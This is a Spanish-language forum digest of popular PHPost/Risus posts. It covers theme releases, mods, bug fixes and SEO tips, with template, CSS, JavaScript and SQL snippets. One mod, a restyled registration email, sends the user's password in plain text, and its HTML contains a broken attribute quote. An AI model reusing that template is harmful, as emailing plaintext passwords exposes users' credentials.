Clasificación


Contenido popular

Mostrando contenido con la mejor reputación desde 24/12/16 en todas las áreas

  1. Rengo

    [Theme] YouTunes [Responsive]

    Me dieron ganas de hacer un theme y bueno salio esto ^^ Vi una web y me gusto, la investigue y bueno así salio este theme, es de un script si lo quieren ver se llama como el theme. Diseñado en base del theme carbon, créditos para @nittox y mods utilizados. Lo hice de varios colores por si alguien no le gustaba, nos enumere y dejo como quedan en cada imagen.. #1: #2: #3 Deberán instalar el mod de portadas para visualizarlo en la home y para post relacionados, de igual manera deje c.posts.php y c.borradores.php ya editados desde 0, osea sin ninguna modificación, ni mods apartes.. dejo un texto en los archivos.. Se instala con el nombre de: youtunes Link MEGA: https://mega.nz/#F!B90jUYjA!_9P7qbfdTFS8SwVvNcKfzQ Link Mediafire: https://www.mediafire.com/#f754o12pix7dv Demo temporal: http://youtunes.hol.es/ Cualquier consulta, duda o queja me dejan en comentarios. es posible que falten algunos toques, me avisan Hasta Luego
    10 Puntos
  2. Tuente

    [Blogi] Blogi oficial

    A continuación les dejo la actualización o nueva versión de PHPost Risus Blog, la cual solucioné varios errores que tenía y le cambie el diseño, ademas agregue nuevas funciones para hacerla más similar a una CMS. ¿Qué trae de nuevo? Junto a la posibilidad de agregar una thumbnail o portada al escribir una entrada, ahora también se puede agregar una descripción, la cual incluiré en el tema Instagram Blog que subiré en breve. El diseño es responsive, utiliza Bootstrap 3 y Fontawesome como proveedor de iconos. Demo: LiDesign Descarga: Mega Cualquier problema me avisan
    7 Puntos
  3. Miguel92

    [Theme] Next v3.0

    Bueno acá otra vez con NEXT, creo que le tengo que cambiar de nombre y llamarlo MI MALDICIÓN por que me dio cada problema, que creo que ya no los tiene...y como ya había comentado lo instale 3 o 4 veces y funciono bien! Qué contiene next? Tiene una carpeta llamada controles, una vez descomprimida van a la url y escriben http://www.tuweb.com/controles/index.php para instalar mod´s agregados... También tiene un archivo que se llama install.php es para ir a la url y escriben http://www.tuweb.com/install.php para instalar el sitemap ¿Que trae? Bueno los mods que ya habia comentado que son: Comunidades Chat Sección vip Subir archivos [upload] Actualización de estado en Home Último usuario registrado Juegos Posts favoritos en perfil Banner en el Perfil +Redes sociales en perfil Compartir shout Sitemap Reportar bug Videos Editor de Wysiwyg Administración de logo + header + titulo Administración de fotos en home Administración de comunidades + Denuncias + Moderación Activar y desactivar secciones Control de Mp En Vivo En vivo: tengo un pequeño problema con este mod porque no cuenta bien las comunidades y/o temas y se visualizan espacios vacios.. Espero de no olvidarme de algunos ¿Se ha quitado algo que tenia? De hecho se quito el Paginador de posts en home y Estilo de menciones porque las modificaciones que había que hacer daba problemas o ni siquiera funcionaba ¿Va a ver más versiones? La verdad no tengo idea si voy a hacer más versiones, tal vez si...pero no sé ¿Solamente tiene ese color celeste? No, no es el único tiene 6 Default[Celeste] Naranja VerdeAmarillento Rojo Oscuro Negro Verde Oscuro Sin caps porque ya la he pubilcado con el tiempo, bueno eso es todo espero de no olvidarme de nada... Si no funciona me corto las venas Descargar [Theme] Next v3
    5 Puntos
  4. Miguel92

    [Theme] SynMobile - Desarrollo -

    Les preseto a: SYNMOBILE porque así, bueno y había iniciado uno nuevo para probar el Risus Mobile v2.5 para ver como era y nunca le di bola, solo lo instale y nunca me di tiempo para modificarlo, pero de ahi logre el Login y Registro.. Entrar ---> http://knightallnight.hol.es/ <--- fijensen si le gusta!! como ya habia dicho recien la empiezo... Se podrian registrar total la web durá 12 meses o 30 dias no me acuedo ya que este es un hosting gratuito... por eso el subdominio
    5 Puntos
  5. Miguel92

    [Theme] Krotos V1

    Bueno acá les dejó uno de los themes del cual les comente...Creo? Se llama KROTOS parecido al nombre que le dio Kmario a su theme Tronos pero nada que ver, se llama de esa forma porque es muy croto jajaja solo por eso! si tienen ideas para ponerle de nombre a este theme avisen jaja XD Todavía les debo: Next v3 -> Si funciona lo instale 3 o 4 veces y si funciona Symplex SynMobile -> Iniciado el 14/12/2016 Syntaxis [Reservado] Extreme -> pero es la version 1.1 Qué contiene el pack Krotos? Tiene una carpeta llamada controles, una vez descomprimida van a la url y escriben http://www.tuweb.com/controles/index.php para instalar mod´s agregado no contiene las comunidades... Contiene la carpeta 'inc'? Si, porque he modificado casi todas y no me acuerdo cual estan y no modificadas... No tiene Smarty Qué más tiene? Dentro de la carpeta themes encontrarán * Krotos_installer.txt * Ktrotos_comu-completas.txt * Comunidades.sql * [DIR] KrotosComunidades Esto es en el caso que no quieran reemplazar la carpeta inc (class,ext,php) Krotos_installer.txt Ktrotos_comu-completas.txt --> Esto es para hacerla realmente completas + administracion + moderacion + denuncias [DIR] KrotosComunidades --> Esto es para agregar a la carpeta inc con todos los fix aplicados Comunidades.sql Hablando de las comunidades, ¿Estan adaptadas? Claro que sí, yo nunca pondría algo sin adaptarlo antes... ¡ El perfil ! No tiene tanta modificación como la página en si... Nota: No se asusten si ven en fondo blanco, quiere decir que no tiene fondo o la direccion que tiene es incorrecta, pueden cambiarle el color al menú obviamente escribiendo el color en inglés Descargate el theme Krotos 28/12/2016 Caps Comunidades https://k60.kn3.net/4/C/7/D/1/2/EB9.png Home https://k60.kn3.net/8/B/C/4/8/5/17A.png https://k60.kn3.net/7/3/C/0/8/5/741.png https://k61.kn3.net/7/7/9/5/0/C/BA6.png https://k60.kn3.net/C/3/C/6/B/2/0FF.png https://k60.kn3.net/C/7/A/7/9/9/D6F.png https://k60.kn3.net/C/3/1/7/5/F/106.png https://k60.kn3.net/4/4/A/D/6/4/10F.png Administración [controles] Perfil https://k60.kn3.net/4/3/A/E/3/4/855.png Espero que les guste el theme...
    5 Puntos
  6. Miguel92

    [Solucion][FIX] Next v3

    Fixed para Next El archivo para descarga contiene Consultas.sql inc/class/c.comunidades.php inc/class/c.envivo.php inc/php/comunidades.php inc/php/envivo.php default/estilo.css default/css/styles_new/prettify.css default/templates/t.comunidades.tpl default/templates/t.files.tpl default/templates/t.juegos.tpl default/templates/t.videos.tpl default/templates/t.vip.tpl default/templates/[DIR] comunidades default/templates/[DIR] t.comus_ajax Primero es 'Prettify' Vamos a css/styles_new/prettify.css y buscamos pre.prettyprint{ ... } y reemplazamos todo ese código con este pre.prettyprint{ padding: 8px; border:1px solid #CCC; line-height: 80%; max-height: auto; overflow-y: auto; white-space: table; word-wrap: break-word; } Segundo es 'Comunidades' Este error no lo había visto porque cuando hice las instalaciones para probar no había creado comunidades, ni temas ya que me he empeñado en reparar todo los otros problemas que no vi ese problema, y esta totalmente fixada No le voy a dar lo que tienen que cambiar...Solo les dejaré los archivos ya modificados y totalmente fixados para evitar enredos y las consultas en el caso de tener que realizarlas... Tercero es 'En vivo' Lo que hice es poner // en algunas lineas y cree algunas consultas porque daba error...Como que falta consultas...Estoy usando el mod de @Vellenger...y creo que la habia modificado! Descarga desde MediaFire: - ¡Muy Pronto! - Descarga desde 4Shared: - [Fix] Next v3 - Descarga desde Mega: - ¡Muy Pronto! -
    3 Puntos
  7. albert2227

    Iniciando desde el inicio http://imgur.com/a/T2vhf 

    Iniciando desde el inicio http://imgur.com/a/T2vhf
    3 Puntos
  8. MrDioamDev

    Risus Minimalist (Act. 02-01-2017)

    ¡Buenas a todos! Antes de empezar, ¡quiero desearles un buen año 2017!. Ahora, les comparto los últimos cambios de Risus Minimalist que será lanzado aproximadamente entre Febrero y Marzo de este año. Changelog del Instalador (y algunas partes del theme y de los archivos del script): -Se añadio un sistema de actualizaciones. -Se añadio el Upgrade alpha -Ahora se respeta si hay un directorio de por medio en la "Direccion URL" en "Configuracion del sitio". -Se añadio el sistema de lenguajes (install/languages). -Ahora todos los recursos que se usan, estan disponibles para usarse sin internet. -Se actualizo el sistema de la informacion del archivo en el codigo. -Arreglos del diseño. -Arreglo de bugs. -Se añadieron consejos y se modificaron textos. -Eliminar texto innecesario en los Inputs. -Ahora se implementa el "numero de serial" o "serial key". -Se arregla el sistema de estadisticas al servidor de DioamDev y Phpost. -Se arregla la url del sitio. -Optimizacion de codigo -Cambios en la licensia y copyright. Changelog del theme: Pronto... Algunas Capturas: INSTALADOR: Posiblemente este va a ser el que salga con la versión alpha y estable. THEME: That's all folks. Próximamente más.
    3 Puntos
  9. vell, sé un par de tus secretos, como el tráfico magico de universidad.biz, entre otros de tus supuestos acortadores. Google todavía no se da cuenta, pero MagicInventor, sí.
    3 Puntos
  10. Miguel92

    [2017] Login + Registro

    Bueno primero que nada perdón a @KMario porque le robe el diseño y lo adapte a mi manera como con todos los mods que tengo!! Primero aplausos a él y luego a mí ja ja En esto solo afectará a Registro y Login solo hay que reemplazar por que sino son muchas cosas para hacer y nos vamos a perder... Otra cosa para tener en cuenta es que deben tener una imagen llamada favicon.png en la carpeta de images si es grande mejor esto dependera de ustedes capturas Login: Registro: Si tienes el Theme Krotos es ir a templates/sections/usuario/s.usuario.tpl y buscamos <a href="javascript:open_login_box()" title="Iniciar Sesión"><span>Iniciar Sesión</span><i class="fa fa-asterisk"></i></a> <div id="login_box" style="display: none;"> <div class="login_header"> <img title="Cerrar mensaje" onclick="close_login_box();" class="login_cerrar" style="left:220px"> </div> <div class="login_cuerpo"> <span class="gif_cargando floatR" id="login_cargando" style="display: none;"></span> <div id="login_error" style="display: none; padding:3px 0;"></div> <form action="javascript:login_ajax()" method="post"> <label>Usuario</label> <input type="text" class="ilogin" id="nickname" name="nick" maxlength="64"> <label>Contraseña</label> <input type="password" class="ilogin" id="password" name="pass" maxlength="64"> <input type="checkbox" id="rem" name="rem" value="true" checked="checked" /> <label for="rem">Recordar usuario</label> <input type="submit" title="Entrar" value="Entrar" style="width:198px; margin-top:5px;" class="mBtn btnOk"> </form> <div class="login_footer"> <a href="#" onclick="remind_password();">¿Olvidaste tu contraseña?</a> <a href="#" onclick="resend_validation();">¿No llegó el correo de validación?</a> <a style="color:green;" onclick="open_login_box(); registro_load_form(); return false" href=""> <strong>Registrate Ahora!</strong> </a> </div> </div> </div> <a href="{$tsConfig.url}/registro/" title="Crear una cuenta"><span>Crear una cuenta</span><i class="fa fa-asterisk"></i></a> Si tienes el Default templates/sections/head_menu.tpl y buscan (es algo parecido este esta modificado) <a href="javascript:open_login_box()" title="Iniciar Sesión"><span>Iniciar Sesión</span><i class="fa fa-asterisk"></i></a> <div id="login_box" style="display: none;"> <div class="login_header"> <img title="Cerrar mensaje" onclick="close_login_box();" class="login_cerrar" style="left:220px"> </div> <div class="login_cuerpo"> <span class="gif_cargando floatR" id="login_cargando" style="display: none;"></span> <div id="login_error" style="display: none; padding:3px 0;"></div> <form action="javascript:login_ajax()" method="post"> <label>Usuario</label> <input type="text" class="ilogin" id="nickname" name="nick" maxlength="64"> <label>Contraseña</label> <input type="password" class="ilogin" id="password" name="pass" maxlength="64"> <input type="checkbox" id="rem" name="rem" value="true" checked="checked" /> <label for="rem">Recordar usuario</label> <input type="submit" title="Entrar" value="Entrar" style="width:198px; margin-top:5px;" class="mBtn btnOk"> </form> <div class="login_footer"> <a href="#" onclick="remind_password();">¿Olvidaste tu contraseña?</a> <a href="#" onclick="resend_validation();">¿No llegó el correo de validación?</a> <a style="color:green;" onclick="open_login_box(); registro_load_form(); return false" href=""> <strong>Registrate Ahora!</strong> </a> </div> </div> </div> 2) Y en ambos casos reemplazan por esto: (Puede quitar esto: <i class="fa fa-asterisk"></i>) <a href="{$tsConfig.url}/login/" title="Iniciar Sesión"><span>Iniciar Sesión</span><i class="fa fa-asterisk"></i></a> <a href="{$tsConfig.url}/registro/" title="Crear una cuenta"><span>Crear una cuenta</span><i class="fa fa-asterisk"></i></a> En si lo que estoy haciendo acá es cambiar href="javascript:open_login_box()" por este href="{$tsConfig.url}/login/" en ambos con la diferencia que uno es login y el otro es registro! Descarga desde 4Shared: - [2017] Login + Registro - Descarga desde Mega: - [2017] Login + Registro - Ante cualquier falla por favor de comunicarse al 0-800-TeEquivocaste-Arreglalo y me estaré comunicando con la solución!
    3 Puntos
  11. Hola a todos compadres, bienvenidos a pistolas fritas a no no es cierto )? Nota: no estoy seguro si esto me pasaba a mi solamente, o si el fix ya esta publicado, si es asi, me avisan. ¡Leer mas abajo! Hoy revisando el theme a ver que se me ocurría hacer con él, me encontre que el selector no marcaba si estaba seleccionada la categoría. SOLUCIÓN: Buscamos en sections/head_categorias.tpl esto: <option value="{$c.c_seo}" {if $tsCategoria == '$c.c_seo'}selected="selected"{/if}>{$c.c_nombre}</option> y lo cambiamos por: <option value="{$c.c_seo}" {if $tsCat == $c.c_seo}selected="selected"{/if}>{$c.c_nombre}</option> y ahora nos marcaría la categoría. gracias y nos vemos P.D: ME DI CUENTA QUE NO MARCA LA CATEGORÍA NI EL LA DEMO DEL SCRIPT (VER)
    3 Puntos
  12. deater

    miedoalamuerte.com

    Hola les presento mi sitio web totalmente basado en Phpost, espero les sea de utilidad es sin fines de lucro y los invito a registrarse ya que lo inicie hace unos pocos meses, desde ya muchas gracias http://miedoalamuerte.com/
    2 Puntos
  13. Miguel92

    [MOD][Modificacion] Registro a tu correo

    Hola este no se como decirle MOD - Modificación - Edición - Registro v2 Asi es como va a ser cap: Nota: No se preocupen no se verá asi porque estoy conectado desde el celular osea lo uso de modem y para abrir el Gmail lo uso en Html Básico y esto descarta todo los efectos y cosas parecidas... y es por eso que se ve asi... Es muy fácil solo hay que ir a inc/class/c.registro.php y buscamos $body = '<div style="background:#0f7dc1;padding:10px;font-family:Arial, Helvetica,sans-serif;color:#000"> <h1 style="color:#FFFFFF; font-weight:bold; font-size:30px;">'.$tsCore->settings['titulo'].'</h1> <div style="background:#FFF;padding:10px;font-size:14px"> <h2 style="font-family:Arial, Helvetica,sans-serif;color:#000;font-size:22px">Hola '.$tsData['user_nick'].'</h2> <p style="font-family:Arial, Helvetica,sans-serif;color:#000">¡Te damos la bienvenida a '.$tsCore->settings['titulo'].'!</p> <p>Para finalizar con el proceso de registro, confirma tu dirección de email accediendo a <a href="'.$tsCore->settings['url'].'/validar/'.$key.'/2/'.$tsCore->setSecure($tsData['user_email']).'">este enlace</a> </p><br /> <br /> <p>Posteriormente podrá acceder con las siguientes credenciales:</p> <p>Usuario: '.$tsData['user_nick'].' <br /> Contraseña: '.$tsData['user_password'].'</p><br /> <p>Antes de empezar a interactuar con la comunidad, te recomendamos que visites el <a target="_blank" href="http://'.$tsCore->settings['url'].'/pages/protocolo/">Protocolo</a> del sitio.</p> <p>Esperamos que disfrutes enormemente tu visita.</p> <p>¡Te damos la bienvenida a Muchas gracias!</p> <p>Staff de '.$tsCore->settings['titulo'].'.</p> <div style="border-top:#CCC solid 1px;padding:10px 0"> <span style="color:#666;font-size:11px"> <center>El staff de <strong>'.$tsCore->settings['titulo'].'</strong></center> </span> </div> </div> </div>'; y la reemplazamos por $body = '<div style="background-image: url(http://sm.ign.com/ign_latam/blogroll/d/darksiders/darksiders-2-deathinitive-edition-release-date-ann_7sj7.jpg); background-position: center; background-repeat: no-repeat; background-size: cover; background-color:#08c; color:#EEE;border-left: 2px solid #088;border-right: 2px solid #088;border-bottom: 2px solid #088;"> <div style="background:rgba(0,0,0,.8);"> <h1 style="background:rgba(255,255,255,.4);padding: 2px 18px; color: #FFF;border-top: 2px solid #088; border-bottom: 2px solid #088; text-shadow: 0 0 6px #CCC, 0 0 4px #DDD, 0 0 2px #888; text-align: center; font-weight:bold; font-size:34px;">'.$tsCore->settings['titulo'].'</h1> <div style="padding:4px; padding: 3px 10px;"> <h2 style="color:#EEE;font-size:22px; text-align: right;padding: 10px 22px;">Hola '.$tsData['user_nick'].'</h2> <p style="color:#EEE; text-align: center; background:rgba(69,69,109,.4); padding: 8px 2px; widht: auto;">¡Te damos la bienvenida a '.$tsCore->settings['titulo'].'!</p> <p>Para finalizar con el proceso de registro, confirma tu dirección de email accediendo a <a href="'.$tsCore->settings['url'].'/validar/'.$key.'/2/'.$tsCore->setSecure($tsData['user_email']).' style="color: #145665; font-weight: bold; text-decoration: none; text-transform: uppercase;">este enlace</a> </p> <div style="padding: 6px;"> <span style="border-bottom: 1px solid #CCC;display: block;padding: 4px 2px;">Posteriormente podrá acceder con las siguientes credenciales:</span> <span style="display: block;background:rgba(10,50,20,.6);padding: 4px 2px;">Usuario: <b>'.$tsData['user_nick'].'</b></span> <span style="display: block;background:rgba(69,129,30,.6);padding: 4px 2px;">Contraseña: <b>'.$tsData['user_password'].'</b></span> </div> <p>Antes de empezar a interactuar con la comunidad, te recomendamos que visites el <a target="_blank" href="http://'.$tsCore->settings['url'].'/pages/protocolo/" style="color: #F4F4F4; font-weight: bold; text-decoration: none;">Protocolo</a> del sitio.</p> <p>Esperamos que disfrutes enormemente tu visita.</p> <p style="font-weight: bold!important; font-size: 28px;text-align: center;">¡Te damos la bienvenida a Muchas gracias!</p> <p style="text-align: right;">Staff de <b>'.$tsCore->settings['titulo'].'</b>.</p> </div> <div style="border-top:#CCC solid 1px;padding:10px 0;background: #CCC;"> <span style="color:#666;font-size:11px;"> <center>El staff de <strong>'.$tsCore->settings['titulo'].'</strong></center> </span> </div> </div> </div>'; en el caso que se quieran asegurar vaya a la line de h1 y dentro de style=" ... " agregan esto width: 100%; igual los que saben de HTML pueden modificarlo a su manera!! Si lo quieren probar Registrensen http://knightallnight.hol.es y vean su correo!!
    2 Puntos
  14. Rengo

    503 service unavailable

    Por que ocultas la url? Para pedir soporte tenes que pasar la url de la web.
    2 Puntos
  15. KillerJohn

    Phpost con virus

    2 Puntos
  16. Rhuan

    [2017] Login + Registro

    Listo.
    2 Puntos
  17. camila

    [Solucion][FIX] Next v3

    gracias
    2 Puntos
  18. Miguel92

    [Solucion][FIX] Next v3

    Como digas, en el archivo Consulta.sql esta la solucion de tu problema en la linea 573 y lo único que tenes que hacer es reemplazar todo eso lo que esta en la lista, nisiquiera tenes que hacer este paso :" Primero es 'Prettify' ":
    2 Puntos
  19. MrDioamDev

    Bootstrap Basic

    Salve Amici mei Hoy les traigo un pequeño aporte, el cual les permitirá diseñar sus plantillas con Bootstrap. Repito, no es un diseño, es una plantilla para (como dije anteriormente) crear themes con bootstrap usando risus. El theme incluye: -Todo el css básico (para los: iconos, dialogs, boxes para las notificaciones, etc) -El Js que viene por defecto - Bootstrap JS/CSS -Jquery 3.0.0 -Mi updater por si saco alguna nueva version (no creo) -y Migrador para la versiones más antiguas que vienen por defecto. Aviso: No vayan a usar el Estilo.css original, porque causará problemas con el framework. El nuevo trae las funciones que mencione anteriormente, y pueden editarlo a su gusto. Aca algunas capturas que tomé: Codigo: Css Necesario: La pueden bajar desde aquí: [Descargar] o: https://mega.nz/#!AQVhnLLa!aX7MvIcoT9Udyrms_aDLNRvEr8GcJxZFoo_Wvx9kZBs Espero que les sirva, nos vemos
    2 Puntos
  20. Rengo

    Nombre de usuario del primer usuario

    {$tsUser->getUserName(1)}
    2 Puntos
  21. xperia92

    Donde conseguir este tema

    ese tema lo cree yo en un 70% Pero para el script de identi, quien lo mejoro fue kocibux pero aun le falta mejorar en velocidad el script
    2 Puntos
  22. Tuente

    Risus Minimalist (Act. 02-01-2017)

    Si será responsive, y con la versión 1.2.7 de risus Desde una tablet: Desde el movil:
    2 Puntos
  23. MagicInventor

    Notificacion post creado

    2017 y ya empezamos con nuevos bugs, bárbaro.
    2 Puntos
  24. Isidro

    Feliz Año Nuevo!

    Feliz Año Nuevo!
    2 Puntos
  25. Hola,estoy viendo tu web y solo te falta subir los archivos a su carpeta,sube la carpeta themes y ya tienes las medallas funcionando. https://mega.nz/#!dRBy1JAC!687NZfl-vfu0ASNDGs1C5BafDf0QbwK7luroNz8vDTo No tienes por qué disculparte,si no lo has hecho nunca,es normal que te pase. Haz siempre una copia del archivo que vayas a editar y cualquier cosa avisas.
    2 Puntos
  26. Feliz Navidad Amigos Aunque no me conecte casi nunca sepan que este foro y la compania de ustedes me hicieron pasar uno de los momentos mas lindos de mi vida ojala que phpost dure para siempre!!!!
    2 Puntos
  27. Truco de jQuery: Ocultar las imagenes que no se ven o con links rotos: Copiar el code en cuaier lquarchivo .js y listo $("img").error(function(){ $(this).hide(); });
    2 Puntos
  28. k_jupiter

    Mejora el SEO de tu web PHPost - Final

    No voy a seguir con el taller de SEO por circunstancias que no voy a explicar, así que a cambio os traigo algunos TIPs o MODs (no sé cómo llamarlo) para vuestro sitio web. Os ayudarán un poco a mejorar el SEO, así que os recomiendo que los utilicéis. 1º Este archivo no viene por default en PHPost, lo cual es una desventaja. Por eso mismo vamos a añadirlo. Os he dejado un post donde se informaba sobre este archivo, publicado por alias3glw, para no tener que repostear nada. Yo os voy a dar mi robots.txt, para que lo utilicéis como guía. Obviamente podéis añadirle muchos códigos. Cread en la raíz un archivo llamado robots.txt y poned este código: User-agent: * Disallow: /perfil/ Disallow: /posts/pagina2 Disallow: /posts/pagina3 Disallow: /posts/pagina4 Disallow: /*.js$ Disallow: /*.css$ Disallow: /*.php$ Crawl-delay: 60 Más info. 2º Sitemap: Es esencial para el SEO de nuestra web. Puedes usar generarlo online en http://www.xmlsitemapgenerator.org/ Después debes enviarlo a Google. 3º Implementar Google Analytics Primero tenéis que registraros en https://www.google.com/analytics/ y añadir vuestro sitio web. Os darán un código. ¿Cómo adaptar este código? Lo colocáis en el main_header.tpl de /themes/tutema/templates/sections antes del </head> de ésta forma: <script> // {literal} CÓDIGO PROPORCIONADO POR GOOGLE // {/literal} </script> Google Analytics te servirá de mucha ayuda: puedes ver número de visitas, sus datos demográficos, el porcentaje de rebote, tiempo de carga de la página... 4º Woorank Ésta página te permitirá aprender muchas cosas sobre SEO. Pon el link de tu web y Woorank la analizará. Puedes ver tu impacto en las redes sociales, tiempo de carga, vista previa de Google, descripción, keywords, etc. La recomiendo. 5º Por último os adjunto el link hacia un PowerPoint oficial de Google donde te introducen de manera fácil al posicionamiento en buscadores. Con ese powerpoint aprenderás lo básico y lo esencial para posicionarte. Click me. Con éstos cinco consejos me despido, siento mucho no haber podido seguir con el taller, pero espero que éste post os haya servido
    1 Puntos
  29. Rengo

    Sonido Para RChat Global

    Traigo otra pequeña modificación del: Poner sonido a los mensajes del chat, lo único molesto es que cada vez que se actualiza la pagina suena Capas alguien lo arregle a eso. Instalación: 1. Abrimos extras.css y abajo de todo agregamos: .btn_chat_sound { background: no-repeat center center; display: inline-block; cursor: pointer; background-color: transparent; background-size: 24px 24px; background-position: center center; background-repeat: no-repeat; opacity: .4; height: 40px; width: 70px; float: left; border: 0; padding: 0; margin: 0; } .btn_chat_sound.on { background-image: url(images/chat/sound-on.svg); } .btn_chat_sound.off { background-image: url(images/chat/sound-off.svg); } 2. Abrimos chat.js (Pongo uno en descarga ya editado) y buscamos: var chat = { abajo agregamos: sound: false, buscamos: text.val('').attr('disabled', 'disabled'); $.getJSON(global_data.url+'/chat-send.php', {message: message}).done(function(data) { text.removeAttr('disabled'); reemplazamos por: text.val('').attr('disabled', 'disabled'); $('.chat_loading').show(); $('.chat_sound').hide(); $.getJSON(global_data.url+'/chat-send.php', {message: message}).done(function(data) { $('.chat_sound').show(); $('.chat_loading').hide(); text.removeAttr('disabled'); buscamos: load: function(s) { $('.chat_msgs').load(global_data.url+'/chat-load.php', function(data) { if(chat.scrollBottom) $('.chat_msgs').scrollTop($('.chat_msgs ul').outerHeight(true)); chat.collect(); }); }, reemplazamos por: load: function(s) { $('.chat_msgs').load(global_data.url+'/chat-load.php', function(data) { if(chat.scrollBottom) $('.chat_msgs').scrollTop($('.chat_msgs ul').outerHeight(true)); if(chat.sound == 'ON' && !s) $(".chat_audio")[0].play(); chat.collect(); }); }, toggleSound: function() { if(chat.sound == 'OFF') { $('.btn_chat_sound').removeClass('off').addClass('on'); chat.sound = 'ON'; }else { $('.btn_chat_sound').removeClass('on').addClass('off'); chat.sound = 'OFF'; } $.cookie('.btn_chat_sound', chat.sound, {expires: 90}); }, Ahora buscamos al final: $(function() { $('.rc_title .buttons button').tipsy({gravity: 's'}); var wForm = $('.chat_form div').outerWidth(); $('.chat_text').css('width', wForm-164); $('.chat_msgs').html(chat.loading); var msgs = $('.chat_msgs'); msgs.scroll(function () { if(msgs.outerHeight(true) + msgs.scrollTop() >= $('.chat_msgs ul').outerHeight(true)-40) { chat.scrollBottom = true; }else { chat.scrollBottom = false; } }); $('.chat_text').on('keypress keydown', function(e) { if(e.keyCode == '13') { chat.send(); return false; } }); setInterval(function() { chat.check(); }, 1000); }); por: $(function() { $('.rc_title .buttons button').tipsy({gravity: 's'}); var wForm = $('.chat_form div').outerWidth(); $('.chat_text').css('width', wForm-164); $('.chat_msgs').html(chat.loading); var msgs = $('.chat_msgs'); chat.sound = $.cookie('.btn_chat_sound'); if(chat.sound == null) $.cookie('.btn_chat_sound', 'OFF', {expires: 90}); else if(chat.sound == 'ON') $('.btn_chat_sound').removeClass('off').addClass('on'); msgs.scroll(function () { if(msgs.outerHeight(true) + msgs.scrollTop() >= $('.chat_msgs ul').outerHeight(true)-40) { chat.scrollBottom = true; }else { chat.scrollBottom = false; } }); $('.chat_text').on('keypress keydown', function(e) { if(e.keyCode == '13') { chat.send(); return false; } }); setInterval(function() { chat.check(); }, 1000); }); 3. En m.rchat.global.tpl buscamos: <button class="btn_online" onclick="chat.online();" title="Usuarios online"></button> y arriba agregamos: <button class="btn_chat_sound off" onclick="chat.toggleSound()" title="Sonido"></button> arriba de <div class="chat_box"> agregamos <audio class="chat_audio"> <source src="{$tsConfig.tema.t_url}/audio/chat_new.mp3" type="audio/mpeg"> <source src="{$tsConfig.tema.t_url}/audio/chat_new.wav" type="audio/wav"> </audio> 4. Descargamos los archivos necesario imágenes y sonidos --> Images y Sound para RChat Global.zip 5. Listo, eso es todo, creo que no me falto nada, sino me avisan Demo para probar el sonido: GenerationCS.com También sirve para la sección del chat que trae el mod por default Créditos: @Rhuan por su chat, @Kmario19 por ayudarme con el guardado de cache en el botón :3 Hasta Luego
    1 Puntos
  30. Miguel92

    [Solucion][FIX] Next v3

    Acá esta el problema...Te tengo que abrazar...Lo del paginador no es que no te funciona tiene que alcanzar los 50 posts en la home, proba bajandole de 50 a 25 en la admin -> configuracion.. ALTER TABLE `p_borradores` ADD `b_resumen` VARCHAR(500) NOT NULL ; Aqui esta las consultas renovadas Consultas.sql @Rhuan Lo agregarias al topic! por favor.. solo la consulta! para descargar..
    1 Puntos
  31. camila

    [Theme] SynMobile - Desarrollo -

    se ve bueno.....
    1 Puntos
  32. paulroses

    ERROR: Votar varias veces en Shouts

    Prueba con esto yo tuve muchos problemas y sólo era por error en el htacess RewriteEngine On RewriteCond %{SERVER_PORT} 80 RewriteRule ^(.*)$ https://www.example.com/$1 [R,L]
    1 Puntos
  33. KillerJohn

    Probando subforo

    Despedite de tu cuenta en Killeringa Rufian
    1 Puntos
  34. paulroses

    HTTPS Duda

    No tienes que tener nada externo para que pueda andar bien tu ssl todo tiene que ser interno, no depender de otra web
    1 Puntos
  35. Miguel92

    [Solucion][FIX] Next v3

    Descarga desde Mega - [Fix] Next v3 -
    1 Puntos
  36. PichoFlow

    Adaptar anomizador

    Buenas compañero ando buscando un anomizador de enlace para adaptarlo con phpost + wordpress Estilo MEGA-Descarga Aqui le dejo la captura: Antes de ver enlace sale Haga Clic en la Publicidad y espere 30 segundo. Despues sale otra web mostrando la publicidad! debe de darle clic en la publicidad para mostrar el enlace y para que corra los segundo. ya es todo, Interesado cuanto cobran en adaptarlo!
    1 Puntos
  37. aperpen

    nesecito que me ayudes adaptar esto a mi web por favor

    http://www.phpost.net/migrate/ ahí puedes actualizar los archivos facilmente a la última versión de Risus
    1 Puntos
  38. Tronlar

    como hago para quitar esto por favor ayuda

    Hola,es una imagen,está en t.home.tpl --> themes/V5/templates/t.home.tpl <a href="/musica/"> <img src="{$tsConfig.url}/themes/V5/max/Musica.png" style="width:300px;height:432px;opacity:0.5;" alt="{$tsConfig.titulo} Música"/> </a>
    1 Puntos
  39. ESTA HECHO Este es un pedido para @KillerJohn 1) Primero ejecutaremos esta consulta o mejor a lo último asi saben en donde lo van a colocar y si van a tener que agregar más consulta CREATE TABLE IF NOT EXISTS `w_background` ( `id` int(11) NOT NULL, `creador` varchar(250) NOT NULL, `home` TEXT NOT NULL, `posts` TEXT NOT NULL, `fotos` TEXT NOT NULL, `admin` TEXT NOT NULL ) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=latin1; INSERT INTO `w_background` (`id`, `creador`,`home`, `posts`, `fotos`, `admin`) VALUES (1, [email protected]', '', '', '', ''); En el caso que quieran más debajo de `posts` TEXT NOT NULL, agregan esto `*` TEXT NOT NULL, --> donde esta * le agregan el nombre que quieran . luego a lado de `posts`, agregan ``, (1, [email protected]', '','', '*', '', ''); asi 2) Ahora vamos a la raiz header.php y buscamos // Nofiticaciones $smarty->assign('tsNots',$tsMonitor->notificaciones); y debajo agregamos // background de home-posts-fotos-etc $smarty->assign('tsBack',$tsMonitor->backgrounds); 3) Ahora buscamos en inc/class/c.core.php y buscamos $this->settings = $this->getSettings(); y debajo agregamos $this->backgrounds = $this->getBack(); y un poco más abajo buscamos /* getCategorias() */ y abajo pegamos /* getBack() :: @Miguel */ function getBack() { $query = db_exec(array(__FILE__, __LINE__), 'query', 'SELECT * FROM `w_background`'); return db_exec('fetch_assoc', $query); } 4) En el mismo directorio buscamos inc/class/c.admin.php y antes de la llave } agregaremos esto /* saveBack() by @Miguel92 */ function saveBack() { global $tsCore; // $c = array( 'creador' => $tsCore->setSecure($tsCore->parseBadWords($_POST['creador'])) , 'home' => $tsCore->setSecure($_POST['home']), 'posts' => $tsCore->setSecure($_POST['posts']), 'fotos' => $tsCore->setSecure($_POST['fotos']), 'admin' => $tsCore->setSecure($_POST['admin']), ); // UPDATE if (db_exec(array(__FILE__, __LINE__), 'query', 'UPDATE `w_background` SET `creador` = \'' . $c['creador']. '\', `home` = \'' . $c['home']. '\', `posts` = \'' . $c['posts']. '\', `fotos` = \'' . 